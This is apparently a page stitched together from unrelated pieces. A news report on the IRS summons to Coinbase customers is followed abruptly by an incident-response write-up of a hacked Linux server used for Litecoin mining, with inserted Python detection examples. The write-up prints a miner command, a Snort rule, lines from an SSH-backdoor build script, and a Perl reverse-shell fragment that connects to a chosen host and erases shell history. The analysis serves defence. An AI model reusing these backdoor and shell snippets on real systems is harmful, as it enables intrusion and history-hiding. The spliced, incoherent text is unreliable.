best litecoin case

A Coinbase customer had filed a motion earlier this month seeking to block the Internal Revenue Service (IRS) from issuing a “John Doe” summons to the Bitcoin exchange. The IRS has now responded to the motion by asking the court to dismiss it and to allow the tax agency to proceed with its summons. The IRS response was filed on December 27, 2016. A “John Doe” summons is an order that does not specifically identify the person but rather identifies a person or ascertainable group or class by their activities. In November, a formal request was filed by the IRS to serve a “John Doe” summons on all United States-based Coinbase customers who transferred convertible virtual currency from 2013 to 2015. The request was granted by Judge Jacqueline Scott Corley after she found a reasonable basis for believing that certain internal revenue laws were flouted and the information sought was not readily available from other sources. Coinbase is a company which facilitates transactions of digital currencies like Bitcoin and Ethereum.
Jeffrey K. Berns, a Coinbase customer, responded by filing a motion to set aside the ruling, which would prevent the summons from being issued. He did so as an “intervenor”, meaning that he was asking the court to allow him to participate in the legal process even though he had not been specifically named in the original summons. Berns’ arguments were based on his concerns regarding the exposure of private customer data to hackers. He also raised his concerns regarding the effect of the summons on the entire blockchain technology industry. In turn, the IRS reiterated the objective behind the summons, which was “to produce information revealing the identity of certain unknown taxpayers.” And since Berns outed himself as a Coinbase user, he is no longer the subject of the summons or related to the matter, and the issue as it affects Berns has been resolved, therefore making his motion invalid. With that, the IRS wants to proceed with issuing the “John Doe” summons on Coinbase customers.
A recent statement from Mr. Berns to NewsBTC affirms that he intends to continue to vigorously seek justice for all Coinbase customers, as the IRS still cannot demonstrate any basis for the information they are seeking. The statement further adds that the IRS’s willingness to withdraw the summons regarding Mr. Berns only, because it is now aware of his identity, makes it clear that the IRS does not have a legitimate purpose in seeking substantial personal and financial information concerning approximately 3 million Americans. According to the statement, the IRS summons that Mr. Berns is seeking to quash does not only request customer names, but also emails, account information, transaction history and a substantial amount of additional data.
Now, in an attempt to prevent the Court from examining its motives in pursuing this unprecedented summons, the IRS seeks to avoid the motion filed by Mr. Berns merely because he has identified himself as a customer. The statement further questions the IRS’s failure to explain its willingness to withdraw the summons as to Mr. Berns, even though that means it will not obtain his personal and financial data from Coinbase. As the IRS is well aware, the purpose of the motion is to prevent the IRS from seeking significant private information concerning approximately 3 million Americans, not just Mr. Berns. Also, Coinbase still stands firm in its opposition to IRS efforts to access customer data. Coinbase had outlined in a previous statement that while it is their practice “to cooperate with properly targeted law enforcement inquiries,” the company is “extremely concerned with the indiscriminate breadth of the government’s request.”
I recently ran across an interesting compromised system. While the initial vulnerability compromised was nothing special (compromised credentials), what the system was being used for and one of his persistence techniques were a lot less common than I normally see. The system had 3 different backdoors and was used for mining virtual currency.

When responding to the system, I quickly noticed that an unknown process was running. Additionally, I saw that the running process was deleted and an additional file with the process had also been deleted (see below). This is a common technique for attackers on Linux systems: while the file is marked deleted on the file system, the process keeps it open until it's stopped.

    1 S www-data 13335     1 99  80   0 - 13941 -      Nov10 ? 12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u -p --algo scrypt --no-longpoll -B

    minerd    13335   www-data  txt       REG        8,1   379680     385036 /tmp/minerd (deleted)
    minerd    13335   www-data    4u     IPv4   14473113                 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)

Minerd is used for Litecoin mining (think of a cheaper version of bitcoin, primed for CPU harvesting of coins).
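
The deleted-but-still-running binary shown in the listing above can be hunted for directly through /proc, where the kernel marks the exe link of such a process with a " (deleted)" suffix. The following is an added example, not code from the original post; the function names, the fake /proc tree and PID 812 are constructed for illustration, while PID 13335 mirrors the listing.

```python
import os
import tempfile

DELETED_SUFFIX = " (deleted)"  # the kernel appends this to the exe link target

def find_deleted_executables(proc_root="/proc"):
    """Return sorted (pid, original_path, cmdline) for unlinked running binaries."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # only numeric directories are processes
        base = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(base, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or no permission
        if not target.endswith(DELETED_SUFFIX):
            continue
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            raw = b""
        cmdline = raw.replace(b"\0", b" ").decode("utf-8", "replace").strip()
        hits.append((int(entry), target[:-len(DELETED_SUFFIX)], cmdline))
    return sorted(hits)

def build_sample_proc(root):
    """Constructed stand-in for /proc; PID 13335 mirrors the listing above."""
    samples = {
        "13335": ("/tmp/minerd (deleted)",
                  "./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u -p "
                  "--algo scrypt --no-longpoll -B"),
        "812": ("/usr/sbin/sshd", "/usr/sbin/sshd -D"),  # constructed, benign
    }
    for pid, (exe, cmd) in samples.items():
        os.makedirs(os.path.join(root, pid))
        os.symlink(exe, os.path.join(root, pid, "exe"))  # dangling link is fine
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmd.replace(" ", "\0").encode() + b"\0")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for hit in find_deleted_executables(build_sample_proc(tmp)):
            print(hit)
```

On a live host, call find_deleted_executables() with no argument as root; a service whose package was upgraded underneath it also shows up, so hits under /tmp or other world-writable paths are the ones to look at first. While the process is still running, its image can be copied out of /proc/<pid>/exe for analysis.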
As virtual currency values continue to increase, I’m expecting to see a lot more of these types of attacks on servers. Mining will be better financially than using the system for spamming or a basic bot.

The specific mining protocol for this software is the Stratum Mining Protocol. A sample of the traffic to the mining pool (178.33.111.19):

    b869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "i

I was able to find a writeup on the protocol at mining.bitcoin.cz/stratum-mining. I did not find a Snort rule for this kind of traffic. The rule below is looking at any port, as I was not able to verify the incoming port should be 9000. It seems to depend on the mining pool the attacker is using.

    alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;)

The attacker had time stomped all the files in the /usr/sbin directory to hide file modifications.
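
The Snort rule above keys on the bytes `{"params": ["` within the first 15 bytes of a payload. The following added example (not from the original post) emulates that byte test next to a parser that reads the JSON-RPC method name, to show what the signature catches and what it misses. It assumes Stratum's newline-delimited JSON-RPC framing and its "mining." method namespace; the payloads are constructed, reusing the three field values visible in the traffic fragment.

```python
import json

# Bytes from the rule's content option: {"params": ["
RULE_CONTENT = bytes.fromhex("7B 22 70 61 72 61 6D 73 22 3A 20 5B 22")
RULE_DEPTH = 15              # the rule searches only the first 15 payload bytes
STRATUM_PREFIX = "mining."   # Stratum methods: mining.notify, mining.submit, ...

def rule_matches(payload):
    """Emulate the rule's content/depth test on one TCP payload."""
    return RULE_CONTENT in payload[:RULE_DEPTH]

def stratum_methods(payload):
    """Parse newline-delimited JSON-RPC and return any Stratum method names."""
    found = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line:
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            continue  # not JSON, or a partial segment
        method = msg.get("method") if isinstance(msg, dict) else None
        if isinstance(method, str) and method.startswith(STRATUM_PREFIX):
            found.append(method)
    return found

def triage(payload):
    return {"rule": rule_matches(payload), "methods": stratum_methods(payload)}

# Constructed payloads (placeholder job id and hash, not captured traffic).
SAMPLES = {
    "notify": b'{"params": ["job1", "' + b"00" * 32 + b'", "", "", [], '
              b'"00000002", "1b340532", "5283bf10", false], '
              b'"id": null, "method": "mining.notify"}\n',
    # Numeric first parameter: no quote after the bracket, so the bytes differ.
    "set_difficulty": b'{"params": [16], "id": null, '
                      b'"method": "mining.set_difficulty"}\n',
    # Unrelated JSON-RPC that happens to serialize "params" first.
    "other_jsonrpc": b'{"params": ["ping"], "id": 7, "method": "app.status"}\n',
    "http": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, triage(payload))
```

The byte signature fires on the notify message and on the unrelated JSON-RPC payload, and stays silent on set_difficulty; checking the method name separates all four cases.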
We found some interesting strings in the SSH daemon to quickly discover the backdoor (see below). Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers. In this case, the attacker was not very stealthy about modifications to the file.

Partial strings from the backdoor:

    [1m |Enjoy this private backdoor!|
    [1m |We won't do any harm to you;) |

The initial script for making the backdoor was not recovered on the servers. Other parts of the toolkit seemed to match up. This may not be the identical script, but it was close to what was used.

    echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}"
    cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp
    echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}"

The second backdoor that was used is a typical IRC bot. Nothing special here; the install directory was /var/lib/.phpdata/sshd. The attacker named the script sshd to try and provide more stealth for the system.
The IRC channel name was #MuieBa.

The third backdoor is a typical Perl reverse shell: give the script the IP and port you want to “shovel a shell” to. It was located in the /tmp folder and was never used by the attacker. The script stops the bash_history file from being saved and echoes output when it connects to the destination. Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and its filename is back.txt.

    print "--== ==-- ";
    print "Usage: $0 [Host] [Port] ";
    die "Ex: $0 127.0.0.1 2121 ";
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host ";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host ";
    print "[*] Spawning Shell ";
    print "--== Thuraya Team ==--   ";
    system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

Are you seeing compromised servers being used for mining currency? Let us know!